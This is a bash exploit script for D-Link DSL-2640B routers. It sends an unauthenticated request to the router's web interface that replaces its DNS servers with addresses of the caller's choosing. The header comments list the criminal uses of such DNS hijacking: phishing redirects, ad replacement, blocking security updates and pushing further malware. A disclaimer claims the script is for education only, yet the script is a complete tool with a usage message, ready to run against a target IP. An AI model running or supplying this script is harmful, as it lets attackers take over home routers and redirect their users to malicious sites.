D-Link DSL-2640B unauthenticated remote dns change exploit

1. #!/bin/bash
2. #
3. #  D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
4. #
5. #  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
6. #  http://www.ethical-hacker.org/
7. #  https://www.facebook.com/ethicalhackerorg
8. #  
9. #  Description:  
10. #  Different D-Link Routers are vulnerable to DNS change.
11. #  The vulnerability exist in the web interface, which is
12. #  accessible without authentication.
13. #
14. #  Tested firmware version: EU_2.03
15. #  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
16. #  DEVICES OR FIRMWARE VERSIONS MAY AFFECTED.
17. #
18. #  Once modified, systems use foreign DNS servers,  which are
19. #  usually set up by cybercriminals. Users with vulnerable
20. #  systems or devices who try to access certain sites are
21. #  instead redirected to possibly malicious sites.
22. #  
23. #  Modifying systems' DNS settings allows cybercriminals to
24. #  perform malicious activities like:
25. #
26. #    o  Steering unknowing users to bad sites:
27. #       These sites can be phishing pages that
28. #       spoof well-known sites in order to
29. #       trick users into handing out sensitive
30. #       information.
31. #
32. #    o  Replacing ads on legitimate sites:
33. #       Visiting certain sites can serve users
34. #       with infected systems a different set
35. #       of ads from those whose systems are
36. #       not infected.
37. #  
38. #    o  Controlling and redirecting network traffic:
39. #       Users of infected systems may not be granted
40. #       access to download important OS and software
41. #       updates from vendors like Microsoft and from
42. #       their respective security vendors.
43. #
44. #    o  Pushing additional malware:
45. #       Infected systems are more prone to other
46. #       malware infections (e.g., FAKEAV infection).
47. #
48. #  Disclaimer:
49. #  This or previous programs is for Educational
50. #  purpose ONLY. Do not use it without permission.
51. #  The usual disclaimer applies, especially the
52. #  fact that Todor Donev is not liable for any
53. #  damages caused by direct or indirect use of the
54. #  information or functionality provided by these
55. #  programs. The author or any Internet provider
56. #  bears NO responsibility for content or misuse
57. #  of these programs or any derivatives thereof.
58. #  By using these programs you accept the fact
59. #  that any damage (dataloss, system crash,
60. #  system compromise, etc.) caused by the use
61. #  of these programs is not Todor Donev's
62. #  responsibility.
63. #
64. #  Use them at your own risk!
65. #
66.      
67.  
68. if [[ $# -gt 3 || $# -lt 2 ]]; then
69.         echo "     D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
70.         echo "  ================================================================"
71.         echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
72.         echo "  Example: $0 192.168.1.1 8.8.8.8"
73.         echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
74.         echo ""
75.         echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
76.         echo "                  http://www.ethical-hacker.org/"
77.         echo "             https://www.facebook.com/ethicalhackerorg"
78.         exit;
79. fi
80. GET=`which GET 2>/dev/null`
81. if [ $? -ne 0 ]; then
82.         echo "  Error : libwww-perl not found =/"
83.         exit;
84. fi
85.         GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1